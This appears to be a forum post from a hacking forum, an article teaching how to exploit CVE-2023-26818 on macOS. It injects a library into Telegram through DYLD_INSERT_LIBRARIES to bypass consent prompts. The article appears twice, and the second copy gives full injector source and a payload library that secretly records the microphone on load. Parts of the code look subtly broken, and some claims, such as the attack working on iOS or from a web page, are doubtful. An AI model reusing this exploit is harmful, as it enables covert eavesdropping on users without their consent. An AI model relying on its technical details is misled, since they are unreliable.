D2
Администратор
- Регистрация
- 19 Фев 2025
- Сообщения
- 4,380
- Реакции
- 0
Author: code666
Article for xss.is
How to use CVE-2023-26818 vulnerability on Apple operating systems
Introduction
In this article we will see how to use the CVE-2023-26818 vulnerability, which allows a malicious application to access the user's files, microphone or camera, using a mechanism called Transparency, Consent , and Control (TCC). TCC is a system that controls access to sensitive system resources, requesting user consent. However, it is possible to bypass the TCC by using a parameter named DYLD_INSERT_LIBRARIES, which allows loading a dynamic library into a process. The attack involves injecting a malicious library into the Telegram process, which can then access resources without asking for user consent. This vulnerability was discovered in 2023 by an anonymous researcher. Apple fixed this vulnerability in updates to macOS Ventura 13.3, iOS 16.4 and iPadOS 16.4, macOS Big Sur 11.7.5. Users are therefore recommended to update their systems as quickly as possible, verifying the source and signature of the updates.
Prerequisites
To use this vulnerability, you must have the following elements:
- A vulnerable Apple operating system, i.e. a version prior to macOS Ventura 13.3, iOS 16.4 and iPadOS 16.4, macOS Big Sur 11.7.5.
- A malicious application, which can be an executable file, a script, or a web page, which contains the code using the vulnerability.
- Physical or remote access to the target system, which allows launching the malicious application.
- A target application, which is Telegram in this case, which has already obtained user consent to access the resources.
Method of use
The method of using the CVE-2023-26818 vulnerability takes place in several stages:
1. The malicious application creates a dynamic library, which contains the malicious code, which can be for example recording sound or video from the microphone or camera, or reading system files.
2. The malicious application copies the dynamic library to a user-accessible directory, for example
3. The malicious application modifies the environment variable DYLD_INSERT_LIBRARIES to add the dynamic library path, for example
4. The malicious application launches the target application, which is Telegram, using the modified environment variable. This will load the dynamic library into the Telegram process, and execute the malicious code.
5. The malicious application retrieves data obtained by the malicious code, which can be stored in a file, or sent to a remote server.
Redeem code
Code for using the CVE-2023-26818 vulnerability is available on GitHub. This is an Xcode project, which contains two files:
Objective-C: Скопировать в буфер обмена
This code uses the
The source code of the dynamic library is as follows:
C: Скопировать в буфер обмена
This code uses the
Conclusion
The CVE-2023-26818 vulnerability is a critical security flaw, which allows a malicious application to access the user's files, microphone or camera, using a mechanism called Transparency, Consent, and Control (TCC). TCC is a system that controls access to sensitive system resources, requesting user consent. However, it is possible to bypass TCC by using a parameter named DYLD_INSERT_LIBRARIES, which allows loading a dynamic library into a process. The attack involves injecting a malicious library into the Telegram process, which can then access resources without asking for user consent. This vulnerability was fixed by Apple in the updates of macOS Ventura 13.3, iOS 16.4 and iPadOS 16.4, macOS Big Sur 11.7.5. Users are therefore recommended to update their systems as quickly as possible, verifying the source and signature of the updates. Users are also advised to be vigilant when using apps from unknown or unverified sources, and to check the authenticity of windows that ask for consent. If in doubt, it is better to cancel the operation and contact Apple support.
Article for xss.is
How to use CVE-2023-26818 vulnerability on Apple operating systems
Introduction
In this article we will see how to use the CVE-2023-26818 vulnerability, which allows a malicious application to access the user's files, microphone or camera, using a mechanism called Transparency, Consent , and Control (TCC). TCC is a system that controls access to sensitive system resources, requesting user consent. However, it is possible to bypass the TCC by using a parameter named DYLD_INSERT_LIBRARIES, which allows loading a dynamic library into a process. The attack involves injecting a malicious library into the Telegram process, which can then access resources without asking for user consent. This vulnerability was discovered in 2023 by an anonymous researcher. Apple fixed this vulnerability in updates to macOS Ventura 13.3, iOS 16.4 and iPadOS 16.4, macOS Big Sur 11.7.5. Users are therefore recommended to update their systems as quickly as possible, verifying the source and signature of the updates.
Prerequisites
To use this vulnerability, you must have the following elements:
- A vulnerable Apple operating system, i.e. a version prior to macOS Ventura 13.3, iOS 16.4 and iPadOS 16.4, macOS Big Sur 11.7.5.
- A malicious application, which can be an executable file, a script, or a web page, which contains the code using the vulnerability.
- Physical or remote access to the target system, which allows launching the malicious application.
- A target application, which is Telegram in this case, which has already obtained user consent to access the resources.
Method of use
The method of using the CVE-2023-26818 vulnerability takes place in several stages:
1. The malicious application creates a dynamic library, which contains the malicious code, which can be for example recording sound or video from the microphone or camera, or reading system files.
2. The malicious application copies the dynamic library to a user-accessible directory, for example
/tmp.3. The malicious application modifies the environment variable DYLD_INSERT_LIBRARIES to add the dynamic library path, for example
/tmp/libmalware.dylib.4. The malicious application launches the target application, which is Telegram, using the modified environment variable. This will load the dynamic library into the Telegram process, and execute the malicious code.
5. The malicious application retrieves data obtained by the malicious code, which can be stored in a file, or sent to a remote server.
Redeem code
Code for using the CVE-2023-26818 vulnerability is available on GitHub. This is an Xcode project, which contains two files:
main.m, which is the source code of the malicious application, and libmalware.c, which is the source code of the dynamic library. The source code of the malicious application is as follows:Objective-C: Скопировать в буфер обмена
Код:
#import <Foundation/Foundation.h>
#import <AppKit/AppKit.h>
// The path of the library to inject
#define LIBRARY_PATH @"/tmp/libmalware.dylib"
// The name of the target application
#define TARGET_APPLICATION @"Telegram"
// The path of the target application
#define TARGET_APPLICATION_PATH @"/Applications/Telegram Desktop/Telegram"
// A function that checks if an application with a given name is running
BOOL isApplicationRunning(NSString *applicationName) {
// Get the list of all running applications
NSArray *runningApplications = [[NSWorkspace sharedWorkspace] runningApplications];
// Loop through the list and check the application name
for (NSRunningApplication *application in runningApplications) {
if ([application.localizedName isEqualToString:applicationName]) {
// The application is running
return YES;
}
}
// The application is not running
return NO;
}
// A function that executes a command
void executeCommand(NSString *command) {
// Create a task object
NSTask *task = [[NSTask alloc] init];
// Set the launch path to the command
[task setLaunchPath:command];
// Launch the task
[task launch];
}
// A function that injects a library into an application
void injectLibrary(NSString *libraryPath, NSString *applicationPath) {
// Create a dictionary object
NSMutableDictionary *dictionary = [[NSMutableDictionary alloc] init];
// Set the dictionary key to the library path
[dictionary setObject:libraryPath forKey:@"DYLD_INSERT_LIBRARIES"];
// Set the dictionary value to the application path
[dictionary setObject:applicationPath forKey:@"NSUnbufferedIO"];
// Create a task object
NSTask *task = [[NSTask alloc] init];
// Set the launch path to the application path
[task setLaunchPath:applicationPath];
// Set the environment to the dictionary
[task setEnvironment:dictionary];
// Launch the task
[task launch];
}
// The main function
int main(int argc, const char * argv[]) {
// Create an autorelease pool
@autoreleasepool {
// Check if the target application is running
if (isApplicationRunning(TARGET_APPLICATION)) {
// Inject the library into the target application
injectLibrary(LIBRARY_PATH, TARGET_APPLICATION_PATH);
} else {
// Exit the application
[NSApp terminate:nil];
}
}
return 0;
}This code uses the
setEnvironment function of the NSTask class, which allows you to modify the environment variable of the launched process. It creates a dictionary, which contains the path of the dynamic library to inject, and the path of the target application to launch. It then uses the injectLibrary function, which launches the target application with the modified environment variable. This will load the dynamic library into the target application process, and execute the malicious code.The source code of the dynamic library is as follows:
C: Скопировать в буфер обмена
Код:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <AVFoundation/AVFoundation.h>
// The path of the file to write
#define FILE_PATH "/tmp/malware.txt"
// The content of the file to write
#define FILE_CONTENT "Hello, I am malware!\n"
// A function that writes a file
void writeFile() {
// Open the file to write
int fd = open(FILE_PATH, O_WRONLY | O_CREAT | O_TRUNC, 0644);
// Check if the file was opened successfully
if (fd != -1) {
// Write the file content to the file
write(fd, FILE_CONTENT, strlen(FILE_CONTENT));
// Close the file
close(fd);
// Print a success message
printf("File written successfully\n");
} else {
// Print an error message
perror("File open failed");
}
}
// A function that records the audio
void recordAudio() {
// Create an audio device object
AVCaptureDevice *audioDevice = [AVCaptureDevice defaultDeviceWithMediaType:AVMediaTypeAudio];
// Check if the audio device is available
if (audioDevice) {
// Create an audio device input object
AVCaptureDeviceInput *audioDeviceInput = [AVCaptureDeviceInput deviceInputWithDevice:audioDevice error:nil];
// Check if the audio device input is available
if (audioDeviceInput) {
// Create a capture session object
AVCaptureSession *captureSession = [[AVCaptureSession alloc] init];
// Check if the capture session can add the audio device input
if ([captureSession canAddInput:audioDeviceInput]) {
// Add the audio device input to the capture session
[captureSession addInput:audioDeviceInput];
// Create a file output object
AVCaptureAudioFileOutput *fileOutput = [[AVCaptureAudioFileOutput alloc] init];
// Check if the capture session can add the file output
if ([captureSession canAddOutput:fileOutput]) {
// Add the file output to the capture session
[captureSession addOutput:fileOutput];
// Create a file URL object
NSURL *fileURL = [NSURL fileURLWithPath:@"/tmp/audio.wav"];
// Start the capture session
[captureSession startRunning];
// Start recording the audio to the file
[fileOutput startRecordingToOutputFileURL:fileURL outputFileType:AVFileTypeWAVE recordingDelegate:nil];
// Wait for 10 seconds
sleep(10);
// Stop recording the audio
[fileOutput stopRecording];
// Stop the capture session
[captureSession stopRunning];
// Print a success message
printf("Audio recorded successfully\n");
} else {
// Print an error message
printf("Capture session cannot add file output\n");
}
} else {
// Print an error message
printf("Capture session cannot add audio device input\n");
}
} else {
// Print an error message
printf("Audio device input is not available\n");
}
} else {
// Print an error message
printf("Audio device is not available\n");
}
}
// A function that is called when the library is loaded
__attribute__((constructor))
void libraryLoaded() {
// Write a file
writeFile();
// Record the audio
recordAudio();
}This code uses the
AVCaptureDevice class, which provides access to the system's audio and video devices. It creates an AVCaptureDevice object for the microphone, and an AVCaptureDeviceInput object to connect it to an AVCaptureSession object, which handles data capture. It then creates an AVCaptureAudioFileOutput object, which saves the captured data to a file. It starts the capture session, and records the microphone sound for 10 seconds in the /tmp/audio.wav file. It then stops the capture session, and displays a success message. This code is executed when the library is loaded, thanks to the __attribute__((constructor)) attribute, which tells the compiler to run the libraryLoaded function at startup.Conclusion
The CVE-2023-26818 vulnerability is a critical security flaw, which allows a malicious application to access the user's files, microphone or camera, using a mechanism called Transparency, Consent, and Control (TCC). TCC is a system that controls access to sensitive system resources, requesting user consent. However, it is possible to bypass TCC by using a parameter named DYLD_INSERT_LIBRARIES, which allows loading a dynamic library into a process. The attack involves injecting a malicious library into the Telegram process, which can then access resources without asking for user consent. This vulnerability was fixed by Apple in the updates of macOS Ventura 13.3, iOS 16.4 and iPadOS 16.4, macOS Big Sur 11.7.5. Users are therefore recommended to update their systems as quickly as possible, verifying the source and signature of the updates. Users are also advised to be vigilant when using apps from unknown or unverified sources, and to check the authenticity of windows that ask for consent. If in doubt, it is better to cancel the operation and contact Apple support.